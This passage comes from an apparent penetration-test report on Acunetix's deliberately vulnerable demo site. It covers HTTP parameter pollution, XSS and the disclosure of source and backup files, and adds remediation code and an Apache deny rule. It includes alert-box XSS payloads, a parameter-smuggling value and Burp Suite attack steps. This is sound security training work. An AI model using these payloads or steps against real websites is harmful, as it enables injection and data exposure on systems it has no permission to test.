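    for label, value in demo().items():
        print(f"{label:15} {value!r}")
```

The vulnerable handler returns the contents of database_connect.php for the traversal payload; the safe handler rejects the traversal and the absolute path at the allow-list and rejects the symlink at the real-path check, while still serving 7.jpg. Keeping both checks is deliberate: the allow-list is the primary control, and the directory check catches what an allow-list cannot see, such as links or mounts created after deployment.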

3. HTTP Parameter Pollution (HPP)

Client-side HTTP parameter pollution (HPP) vulnerabilities arise when an application embeds user input in URLs
in an unsafe manner. An attacker can use this to construct a URL that, if visited by another application user,
modifies URLs within the response by inserting additional query string parameters and sometimes overriding
existing ones. This may result in links and forms having unexpected side effects. For example, it may be possible
to modify an invitation form using HPP so that the invitation is delivered to an unexpected recipient.
The security impact depends largely on the nature of the application functionality. Even if it has no direct
impact on its own, an attacker may combine it with other vulnerabilities to escalate their overall severity.

Steps (screenshots not reproduced):
1. Intercept the request in Burp Suite, send it to Repeater and add an extra parameter to the query string.
2. Check the response in Repeater, then load the same URL in the browser.
3. Click link1 and link2 on the page.
4. The injected parameter is carried into those links, which confirms that the payload was injected into the
   URLs the page generates.

Remediation
Ensure that user input is URL-encoded before it is embedded in a URL.

4. Cross-Site Scripting (XSS)

Overview
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise
benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code,
generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a user within the output it generates
without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way
to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a
trusted source, the malicious script can access any cookies, session tokens, or other sensitive information
retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

How to perform This Attack?

Steps to follow (performed on the intentionally vulnerable application http://testphp.vulnweb.com/):

1. Open the above link in the Firefox browser.

2. To test whether the application is vulnerable to XSS, enter a script in the search bar:

   <script>alert("Hacked")</script>

   (http://testphp.vulnweb.com/)

3. Also enter the script in the Message field of the guestbook
   (http://testphp.vulnweb.com/guestbook.php).

4. The same script also works in the comment field
   (http://testphp.vulnweb.com/comment.php?aid=1).

5. Alternatively, intercept the request in Burp Suite, send it to Repeater and replace the parameter value with
   <script>alert(1)</script>; the script is returned in the response unencoded.
Remediation

Three complementary defences apply:
1. Validate input: accept only the characters a field actually needs.
2. Encode output: HTML-encode user data at the point where it is written into the page, so that < and > cannot
   open a tag and quotes cannot break out of an attribute.
3. Sanitise: where some HTML must be allowed, strip or rewrite dangerous elements with a sanitising library.
Sanitising data is a strong defence but should not be used alone against XSS; a secure application usually needs
all three.
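The remediation for HPP (URL-encode before embedding in a URL) and the output-encoding remediation for XSS are the same idea applied to two contexts, so one added example covers both; it is not the target's code. The link builder, the page renderer and the parameter name aid are assumptions made for the demo; the payloads are the ones used in the sections above plus a value carrying its own &key=value pair.

```python
"""Context-correct encoding of user input: URL context (HPP) and HTML context (XSS). Added example."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

XSS_PAYLOAD = '<script>alert("Hacked")</script>'
HPP_PAYLOAD = "1&aid=2"  # a "value" that smuggles a second parameter


def link_to(base, params, encode):
    """Build base?k=v&...; with encode=False the values are pasted in raw, as a vulnerable page does."""
    if encode:
        query = urlencode(params)  # '&', '=', '?', '#' become %xx sequences
    else:
        query = "&".join(f"{k}={v}" for k, v in params.items())
    return f"{base}?{query}"


def params_as_seen_by_server(url):
    """What the receiving script's $_GET would contain (PHP keeps the last duplicate)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def render_search(term, encode):
    """Echo a search term into the page body, the pattern that made search.php vulnerable."""
    shown = html.escape(term, quote=True) if encode else term
    return f"<h2>search results for: {shown}</h2>"


def demo():
    """Return the raw and encoded results side by side for both contexts."""
    unsafe_url = link_to("/comment.php", {"aid": HPP_PAYLOAD}, encode=False)
    safe_url = link_to("/comment.php", {"aid": HPP_PAYLOAD}, encode=True)
    return {
        "unsafe_url": unsafe_url,
        "unsafe_params": params_as_seen_by_server(unsafe_url),
        "safe_url": safe_url,
        "safe_params": params_as_seen_by_server(safe_url),
        "unsafe_html": render_search(XSS_PAYLOAD, encode=False),
        "safe_html": render_search(XSS_PAYLOAD, encode=True),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label:14} {value}")
```

Without encoding, the link becomes /comment.php?aid=1&aid=2 and the server sees two aid values, the polluted one winning in PHP; with urlencode the whole string stays a single aid value of 1&aid=2. In the HTML context, html.escape turns the script tag into &lt;script&gt;...&lt;/script&gt;, which the browser displays as text instead of executing. The two encoders are not interchangeable: HTML-escaping a value placed in a URL does nothing about the & that causes pollution, and URL-encoding a value placed in HTML leaves < and > intact.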

5.SOURCE CODE DISCLOSURE


Obtaining the source code of server-side scripts grants the attacker deeper knowledge of the logic behind the
web application, how the application handles requests and their parameters, the structure of the database,
vulnerabilities in the code and source code comments.

URL: http://testphp.vulnweb.com/index.bak

Contents of the backup file as served:

<?PHP require_once("database_connect.php"); ?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php"
codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->


<title>Home of WASP Art</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName">ACUNETIX ART</h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
<div id="globalNav">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> |
<a href="guestbook.php">guestbook</a>
</div>
</div>
<!-- end masthead -->

<!-- begin content -->


<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
<h2 id="pageName">welcome to our page</h2>
<div class="story">
<h3>Test site for WASP.</h3>
</div>
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar">
<div id="search">
<form action="search.php" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li>
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li>
</ul>
</div>
<div id="advert">
<p><img src="images/add.jpg" alt="" width="107" height="66"></p>
</div>
</div>

<!--end navbar -->


<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site
Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact
Us</a> | &copy;2004
Acunetix Ltd
</div>
<br>
</div>
</body>
<!-- InstanceEnd --></html>

This backup file reveals the server-side source: the page begins with require_once("database_connect.php"),
so the database connection logic lives in a separate file, and the rest exposes the template structure, the
search form (a POST to search.php with a searchFor field) and the link layout used by the site.

2.
URL:
http://testphp.vulnweb.com/pictures/wp-config.bak

This is a second backup file left in a web-accessible directory. The report does not reproduce its contents; a
WordPress wp-config file normally holds the database host, database name, user name and password.

With this information an attacker can connect to the database directly and read, modify or delete its entries.

Remediation:

Review why backup copies of source files are present under the web root (editor backups, deployment
leftovers) and remove them, then configure the web server to refuse to serve backup extensions such as .bak
so that a future leftover is not exposed.
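A server-side guard for the remediation above, as an added example that is not from the report: Apache 2.2 configuration, matching the Apache/2.2.3 seen in the phpinfo dump, that refuses to serve common backup and editor-swap extensions anywhere under the document root. The extension list and the placement in the main server config are assumptions; on Apache 2.4 the two Order/Deny lines are replaced by Require all denied.

```apache
# Deny backup copies of source files (index.bak, wp-config.bak, foo.php~, .swp, ...)
# Apache 2.2 syntax; on 2.4 use "Require all denied" instead of Order/Deny.
<FilesMatch "(\.(bak|old|orig|save|swp|tmp)|~)$">
    Order allow,deny
    Deny from all
</FilesMatch>
```

This is a safety net, not the fix: the files should still be removed, because the rule does not stop other extensions (index.php.txt, index.php.1) and does nothing for a copy that is zipped or renamed.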
